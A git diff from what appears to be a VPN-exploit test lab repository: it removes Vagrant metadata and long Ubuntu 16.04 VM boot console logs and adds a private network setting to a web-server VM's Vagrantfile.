-[ OK ] Started Serial Getty on ttyS0. -[ OK ] Reached target Login Prompts. -[ OK ] Reached target Multi-User System. -[ OK ] Reached target Graphical Interface. - Starting Update UTMP about System Runlevel Changes... -[ OK ] Started Set console scheme. -[ OK ] Started Update UTMP about System Runlevel Changes. -[ 25.109438] cloud-init[1452]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:39 +0000. Up 24.78 seconds. -[ OK ] Started Apply the settings specified in cloud-config. - Starting Execute cloud user/final scripts... -[ 25.926116] cloud-init[1480]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:40 +0000. Up 25.62 seconds. -[ 25.956815] cloud-init[1480]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:40 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 25.88 seconds -[ OK ] Started Execute cloud user/final scripts. -[ OK ] Reached target Cloud-init target. - -Ubuntu 16.04.7 LTS vague-vpn-server ttyS0 - -vague-vpn-server login: \ No newline at end of file diff --git a/virtual-test-environment/edgers/web-server/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/edgers/web-server/.vagrant/machines/default/virtualbox/vagrant_cwd deleted file mode 100644 index d0d40e0..0000000 --- a/virtual-test-environment/edgers/web-server/.vagrant/machines/default/virtualbox/vagrant_cwd +++ /dev/null @@ -1 +0,0 @@ -/home/jive/space/gittin/VeepExploit/virt-lab/edgers/web-server \ No newline at end of file diff --git a/virtual-test-environment/edgers/web-server/Vagrantfile b/virtual-test-environment/edgers/web-server/Vagrantfile index 8545714..c8280ef 100644 --- a/virtual-test-environment/edgers/web-server/Vagrantfile +++ b/virtual-test-environment/edgers/web-server/Vagrantfile @@ -1,5 +1,4 @@ # -*- mode: ruby -*- - # vi: set ft=ruby : Vagrant.configure(2) do |config| @@ -8,6 +7,7 @@ Vagrant.configure(2) do |config| config.vm.network "forwarded_port", guest: 22, host: 22113, id: 'ssh' config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.3.2", virtualbox__intnet: "intnet-3" config.vm.provider "virtualbox" do |vb| diff --git a/virtual-test-environment/edgers/web-server/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/edgers/web-server/ubuntu-xenial-16.04-cloudimg-console.log deleted file mode 100644 index 89fe650..0000000 --- a/virtual-test-environment/edgers/web-server/ubuntu-xenial-16.04-cloudimg-console.log +++ /dev/null @@ -1,648 +0,0 @@ -[ 0.000000] Initializing cgroup subsys cpuset -[ 0.000000] Initializing cgroup subsys cpu -[ 0.000000] Initializing cgroup subsys cpuacct -[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) -[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] KERNEL supported cpus: -[ 0.000000] Intel GenuineIntel -[ 0.000000] AMD AuthenticAMD -[ 0.000000] Centaur CentaurHauls -[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' -[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. -[ 0.000000] e820: BIOS-provided physical RAM map: -[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable -[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved -[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable -[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data -[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved -[ 0.000000] NX (Execute Disable) protection: active -[ 0.000000] SMBIOS 2.5 present. -[ 0.000000] Hypervisor detected: KVM -[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 -[ 0.000000] MTRR: Disabled -[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. -[ 0.000000] CPU MTRRs all blank - virtualized system. -[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC -[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] -[ 0.000000] Scanning 1 areas for low memory corruption -[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] -[ 0.000000] ACPI: Early table checksum verification disabled -[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) -[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) -[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) -[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 -[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) -[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) -[ 0.000000] No NUMA configuration found -[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] -[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] -[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 -[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock -[ 0.000000] kvm-clock: using sched offset of 4300726245 cycles -[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns -[ 0.000000] Zone ranges: -[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] -[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] -[ 0.000000] Normal empty -[ 0.000000] Device empty -[ 0.000000] Movable zone start for each node -[ 0.000000] Early memory node ranges -[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] -[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] -[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] -[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 -[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) -[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) -[ 0.000000] Using ACPI (MADT) for SMP configuration information -[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs -[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] -[ 0.000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] -[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] -[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI devices -[ 0.000000] Booting paravirtualized kernel on KVM -[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns -[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 -[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 -[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 -[ 0.000000] Policy zone: DMA32 -[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) -[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) -[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 -[ 0.000000] Kernel/User page tables isolation: enabled -[ 0.000000] Hierarchical RCU implementation. -[ 0.000000] Build-time adjustment of leaf fanout to 64. -[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. -[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 -[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 -[ 0.000000] Console: colour VGA+ 80x25 -[ 0.000000] console [tty1] enabled -[ 0.000000] console [ttyS0] enabled -[ 0.000000] tsc: Detected 2207.998 MHz processor -[ 0.575042] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) -[ 0.583719] pid_max: default: 32768 minimum: 301 -[ 0.589265] ACPI: Core revision 20150930 -[ 0.597268] ACPI: 2 ACPI AML tables successfully acquired and loaded -[ 0.602962] Security Framework initialized -[ 0.605820] Yama: becoming mindful. -[ 0.608917] AppArmor: AppArmor initialized -[ 0.613142] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) -[ 0.621886] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) -[ 0.625904] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 0.632797] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) -[ 0.640010] Initializing cgroup subsys io -[ 0.641861] Initializing cgroup subsys memory -[ 0.646365] Initializing cgroup subsys devices -[ 0.650708] Initializing cgroup subsys freezer -[ 0.654877] Initializing cgroup subsys net_cls -[ 0.660436] Initializing cgroup subsys perf_event -[ 0.662136] Initializing cgroup subsys net_prio -[ 0.664624] Initializing cgroup subsys hugetlb -[ 0.668553] Initializing cgroup subsys pids -[ 0.702382] mce: CPU supports 0 MCE banks -[ 0.704296] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 -[ 0.709690] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 -[ 0.714547] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization -[ 0.720968] Spectre V2 : Mitigation: Full generic retpoline -[ 0.724802] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch -[ 0.730770] Speculative Store Bypass: Vulnerable -[ 0.734372] SRBDS: Unknown: Dependent on hypervisor status -[ 0.737588] MDS: Mitigation: Clear CPU buffers -[ 0.748139] Freeing SMP alternatives memory: 36K -[ 0.760919] ftrace: allocating 32339 entries in 127 pages -[ 0.887852] smpboot: APIC(0) Converting physical 0 to logical package 0 -[ 0.890169] smpboot: Max logical packages: 1 -[ 0.892305] x2apic enabled -[ 0.895379] Switched APIC routing to physical x2apic. -[ 0.900676] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 -[ 1.011887] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) -[ 1.021469] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. -[ 1.052923] KVM setup paravirtual spinlock -[ 1.058553] x86: Booting SMP configuration: -[ 1.064047] .... node #0, CPUs: #1 -[ 1.084173] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock -[ 1.121613] mce: CPU supports 0 MCE banks -[ 1.133994] x86: Booted up 1 node, 2 CPUs -[ 1.136440] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) -[ 1.140689] devtmpfs: initialized -[ 1.145419] evm: security.selinux -[ 1.147142] evm: security.SMACK64 -[ 1.148476] evm: security.SMACK64EXEC -[ 1.149876] evm: security.SMACK64TRANSMUTE -[ 1.151392] evm: security.SMACK64MMAP -[ 1.152821] evm: security.ima -[ 1.154297] evm: security.capability -[ 1.164021] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns -[ 1.167742] futex hash table entries: 512 (order: 3, 32768 bytes) -[ 1.185759] pinctrl core: initialized pinctrl subsystem -[ 1.188561] RTC time: 22:38:15, date: 01/25/21 -[ 1.194323] NET: Registered protocol family 16 -[ 1.222445] cpuidle: using governor ladder -[ 1.234673] cpuidle: using governor menu -[ 1.243003] PCCT header not found. -[ 1.244661] ACPI: bus type PCI registered -[ 1.246119] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 -[ 1.253790] PCI: Using configuration type 1 for base access -[ 1.271286] ACPI: Added _OSI(Module Device) -[ 1.278089] ACPI: Added _OSI(Processor Device) -[ 1.280804] ACPI: Added _OSI(3.0 _SCP Extensions) -[ 1.283686] ACPI: Added _OSI(Processor Aggregator Device) -[ 1.288993] ACPI: Executed 1 blocks of module-level executable AML code -[ 1.297022] ACPI: Interpreter enabled -[ 1.298650] ACPI: (supports S0 S5) -[ 1.301397] ACPI: Using IOAPIC for interrupt routing -[ 1.306020] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug -[ 1.321414] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) -[ 1.326869] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] -[ 1.330933] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] -[ 1.339279] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. -[ 1.350721] PCI host bridge to bus 0000:00 -[ 1.355753] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] -[ 1.366668] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] -[ 1.371136] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] -[ 1.379429] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] -[ 1.386375] pci_bus 0000:00: root bus resource [bus 00-ff] -[ 1.398571] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] -[ 1.406737] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] -[ 1.412737] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] -[ 1.444886] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] -[ 1.505211] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI -[ 1.513970] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB -[ 1.555570] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) -[ 1.588357] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) -[ 1.635129] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) -[ 1.663658] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) -[ 1.670973] ACPI: Enabled 2 GPEs in block 00 to 07 -[ 1.676792] vgaarb: setting as boot device: PCI:0000:00:02.0 -[ 1.677897] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none -[ 1.698863] vgaarb: loaded -[ 1.710492] vgaarb: bridge control possible 0000:00:02.0 -[ 1.723397] SCSI subsystem initialized -[ 1.725861] ACPI: bus type USB registered -[ 1.726976] usbcore: registered new interface driver usbfs -[ 1.752574] usbcore: registered new interface driver hub -[ 1.772215] usbcore: registered new device driver usb -[ 1.811617] PCI: Using ACPI for IRQ routing -[ 1.816358] NetLabel: Initializing -[ 1.851996] NetLabel: domain hash size = 128 -[ 1.860481] NetLabel: protocols = UNLABELED CIPSOv4 -[ 1.872951] NetLabel: unlabeled traffic allowed by default -[ 1.876921] amd_nb: Cannot enumerate AMD northbridges -[ 1.882216] clocksource: Switched to clocksource kvm-clock -[ 1.899768] AppArmor: AppArmor Filesystem Enabled -[ 1.922433] pnp: PnP ACPI init -[ 1.924150] pnp: PP ACPI: fond 3 devices - -[ 2.018708] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns -[ 2.021249] NET: Registered protocol fily 2 - -[ 2.144059] TCP established hash table entries: 8192 (order: 4, 65536 bytes) -[ 2.147997] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) -[ 2.149346] TCP: Hash tables confiured (established 8192 bind 8192) -[ 2.227607] UDP hash table entries: 512 (order: 2, 16384 bytes) -[ 2.231478] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) -[ 2.243419] NET: Registered protocol family 1 -[ 2.247564] pci 0000:00:00.0: Limiting direct PCPCItransfers -[ 2.400035] pci 0000:00:01.0: Activating ISA DMA hang workarounds -[ 2.407063] Unpacking initramfs... - -[ 3.036235] Freeing initrd memory: 14880K -[ 3.056585] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns -[ 3.095888] platform rtc_cmos: registered platform RTC device (no PNP device found) -[ 3.124566] Scanning for low memory corruption every 60 seconds -[ 3.126155] audit: initializing netlink subsys (disabled) -[ 3.175576] audit: type=2000 audit(1611614301.900:1): initialized -[ 3.177099] Initialise system trusted keyring -[ 3.225742] HugeTLB registered 2 MB page size, pre-allocated 0 pages -[ 3.232683] zbud: loaded -[ 3.261923] VFS: Disk quotas dquot_6.6.0 -[ 3.272145] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) -[ 3.273698] squashfs: version 4.0 (2009/01/31) Phillip Lougher -[ 3.276216] fuse init (API version 7.23) -[ 3.297437] Key type big_key registered -[ 3.304135] Allocating IMA MOK and blacklist keyrings. -[ 3.321176] Key type asymmetric registered -[ 3.329651] Asymmetric key parser 'x509' registered -[ 3.335978] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) -[ 3.339896] io scheduler noop registered -[ 3.340878] io scheduler deadline registered (default) -[ 3.341937] io scheduler cfq registered -[ 3.372270] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 -[ 3.378695] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 -[ 3.380257] ACPI: AC Adapter [AC] (on-line) -[ 3.381394] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 -[ 3.388427] ACPI: Power Button [PWRF] -[ 3.389461] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 -[ 3.414885] ACPI: Sleep Button [SLPF] -[ 3.426173] ACPI: Battery Slot [BAT0] (battery present) -[ 3.426239] GHES: HEST is not enabled! -[ 3.426398] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled -[ 3.469347] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A -[ 3.477770] Linux agpgart interface v0.103 -[ 3.492058] loop: module loaded -[ 3.493484] scsi host0: ata_piix -[ 3.496318] scsi host1: ata_piix -[ 3.497145] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 -[ 3.498487] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 -[ 3.503407] libphy: Fixed MDIO Bus: probed -[ 3.505103] tun: Universal TUN/TAP device driver, 1.6 -[ 3.506095] tun: (C) 1999-2004 Max Krasnyansky - 3.517785] PPP generic driver version 2.4.2 -[ 3.591736] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver -[ 3.612121] ehci-pci: EHCI PCI platform driver -[ 3.621981] ehci-platform: EHCI generic platform driver -[ 3.628241] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver -[ 3.634677] ohci-pci: OHCI PCI platform driver -[ 3.635620] ohci-platform: OHCI generic platform driver -[ 3.659878] uhci_hcd: USB Universal Host Controller Interface driver -[ 3.668560] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 -[ 3.671741] serio: i8042 KBD port at 0x60,0x64 irq 1 -[ 3.686717] serio: i8042 AUX port at 0x60,0x64 irq 12 -[ 3.698853] mousedev: PS/2 mouse device common for all mice -[ 3.724753] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 -[ 3.736563] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 -[ 3.744336] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram -[ 3.768396] i2c /dev entries driver -[ 3.783048] device-mapper: uevent: version 1.0.3 -[ 3.796348] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com -[ 3.798124] ledtrig-cpu: registered to indicate activity on CPUs -[ 3.830428] NET: Registered protocol family 10 -[ 3.831670] NET: Registered protocol family 17 -[ 3.857652] Key type dns_resolver registered -[ 3.864214] registered taskstats version 1 -[ 3.868439] Loading compiled-in X.509 certificates -[ 3.875843] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' -[ 3.883843] zswap: loaded using pool lzo/zbud -[ 3.904214] Key type trusted registered -[ 3.916783] Key type encrypted registered -[ 3.924786] AppArmor: AppArmor sha1 policy hashing enabled -[ 3.926027] ima: No TPM chip found, activating TPM-bypass! -[ 3.942553] ima: Allocated hash algorithm: sha1 -[ 3.950671] evm: HMAC attrs: 0x1 -[ 3.956026] Magic number: 5:763:654 -[ 3.974063] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:18 UTC (1611614298) -[ 4.000216] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found -[ 4.002461] EDD information not available. -[ 4.011381] Freeing unused kernel memory: 1492K -[ 4.038332] Write protecting the kernel read-only data: 14336k -[ 4.039964] Freeing unused kernel memory: 1592K -[ 4.133703] Freeing unused kernel memory: 56K -Loading, please wait... -starting version[ 4.160957] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) - 229 -[ 4.161653] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.161684] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.180156] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.180211] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.180366] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.180428] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.180492] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.180554] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.180614] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.354614] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI -[ 4.357483] e1000: Copyright (c) 1999-2006 Intel Corporation. -[ 4.359986] Fusion MPT base driver 3.04.20 -[ 4.362475] Copyright (c) 1999-2008 LSI Corporation -[ 4.369112] Fusion MPT SPI Host driver 3.04.20 -[ 4.386455] AVX2 version of gcm_enc/dec engaged. -[ 4.388632] AES CTR mode by8 optimization enabled -[ 4.671496] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 -[ 4.873896] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff -[ 4.876355] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection -[ 4.888424] mptbase: ioc0: Initiating bringup -[ 5.432969] ioc0: LSI53C1030 A0: Capabilities={Initiator} -[ 6.420288] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 -[ 7.074728] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 7.076780] scsi target2:0:0: Beginning Domain Validation -[ 7.079222] scsi target2:0:0: Domain Validation skipping write tests -[ 7.080761] scsi target2:0:0: Ending Domain Validation -[ 7.082590] scsi target2:0:0: asynchronous -[ 7.087412] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 7.089869] scsi target2:0:1: Beginning Domain Validation -[ 7.092211] scsi target2:0:1: Domain Validation skipping write tests -[ 7.093721] scsi target2:0:1: Ending Domain Validation -[ 7.097186] scsi target2:0:1: asynchronous -[ 7.184155] sd 2:0:0:0: Attached scsi generic sg0 type 0 -[ 7.188086] sd 2:0:1:0: Attached scsi generic sg1 type 0 -[ 7.194855] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) -[ 7.197807] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) -[ 7.199951] sd 2:0:0:0: [sda] Write Protect is off -[ 7.201561] sd 2:0:0:0: [sda] Incomplete mode parameter data -[ 7.208120] sd 2:0:0:0: [sda] Assuming drive cache: write through -[ 7.210229] sd 2:0:1:0: [sdb] Write Protect is off -[ 7.218523] sd 2:0:1:0: [sdb] Incomplete mode parameter data -[ 7.220347] sd 2:0:1:0: [sdb] Assuming drive cache: write through -[ 7.245530] sda: sda1 -[ 7.261105] sd 2:0:0:0: [sda] Attached SCSI disk -[ 7.284137] sd 2:0:1:0: [sdb] Attached SCSI disk -[ 7.582110] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:48:2b:b0 -[ 7.627459] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection -[ 7.651176] e1000 0000:00:08.0 enp0s8: renamed from eth1 -[ 7.686548] e1000 0000:00:03.0 enp0s3: renamed from eth0 -Begin: Loading essential drivers ... [ 9.714246] md: linear personality registered for level -1 -[ 9.729404] md: multipath personality registered for level -4 -[ 9.744495] md: raid0 personality registered for level 0 -[ 9.763889] md: raid1 personality registered for level 1 -[ 9.866297] raid6: sse2x1 gen() 4645 MB/s -[ 9.934328] raid6: sse2x1 xor() 2570 MB/s -[ 10.002463] raid6: sse2x2 gen() 6232 MB/s -[ 10.076201] raid6: sse2x2 xor() 1782 MB/s -[ 10.162391] raid6: sse2x4 gen() 3845 MB/s -[ 10.230586] raid6: sse2x4 xor() 5943 MB/s -[ 10.299643] raid6: avx2x1 gen() 10133 MB/s -[ 10.370262] raid6: avx2x2 gen() 7019 MB/s -[ 10.439282] raid6: avx2x4 gen() 6788 MB/s -[ 10.459392] raid6: using algorithm avx2x1 gen() 10133 MB/s -[ 10.460593] raid6: using avx2x2 recovery algorithm -[ 10.498745] xor: automatically using best checksumming function: -[ 10.573826] avx : 11989.000 MB/sec -[ 10.615514] async_tx: api initialized (async) -[ 10.874590] md: raid6 personality registered for level 6 -[ 10.905904] md: raid5 personality registered for level 5 -[ 10.918809] md: raid4 personality registered for level 4 -[ 10.975507] md: raid10 personality registered for level 10 -done. -Begin: Running /scripts/init-premount ... done. -Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. -Begin: Running /scripts/local-premount ... [ 11.162185] Btrfs loaded -Scanning for Btrfs filesystems -done. -Warning: fsck not present, so skipping root file system -[ 11.248627] EXT4-fs (sda1): INFO: recovery required on readonly filesystem -[ 11.252196] EXT4-fs (sda1): write access will be enabled during recovery -[ 11.443014] EXT4-fs (sda1): recovery complete -[ 11.465874] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) -done. -Begin: Running /scripts/local-bottom ... done. -Begin: Running /scripts/init-bottom ... done. -[ 11.709683] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) -[ 11.756548] systemd[1]: Detected virtualization oracle. -[ 11.782332] systemd[1]: Detected architecture x86-64. - -Welcome to Ubuntu 16.04.7 LTS! - -[ 11.816017] systemd[1]: Set hostname to . -[ 12.168541] ranom nolokingpol is initialized -[ 12.885554] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. -[ OK ] Listening on /dev/initctl Compatibility Named Pipe. -[ 12.969913] systemd[1]: Listening on udev Kernel Socket. -[ OK ] Listening on udev Kernel Socket. -[ 13.025691] systemd[1]: Listening on Journal Socket (/dev/log). -[ OK ] Listening on Journal Socket (/dev/log). -[ 13.042969] systemd[1]: Reached target User and Group Name Lookups. -[ OK ] Reached target User and Group Name Lookups. -[ 13.114578] systemd[1]: Listening on Device-mapper event daemon FIFOs. -[ OK ] Listening on Device-mapper event daemon FIFOs. -[ 13.149310] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. -[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. -[ 13.203203] systemd[1]: Created slice System Slice. -[ OK ] Created slice System Slice. -[ 13.234550] systemd[1]: Listening on udev Control Socket. -[ OK ] Listening on udev Control Socket. -[ 13.254582] systemd[1]: Listening on LVM2 poll daemon socket. -[ OK ] Listening on LVM2 poll 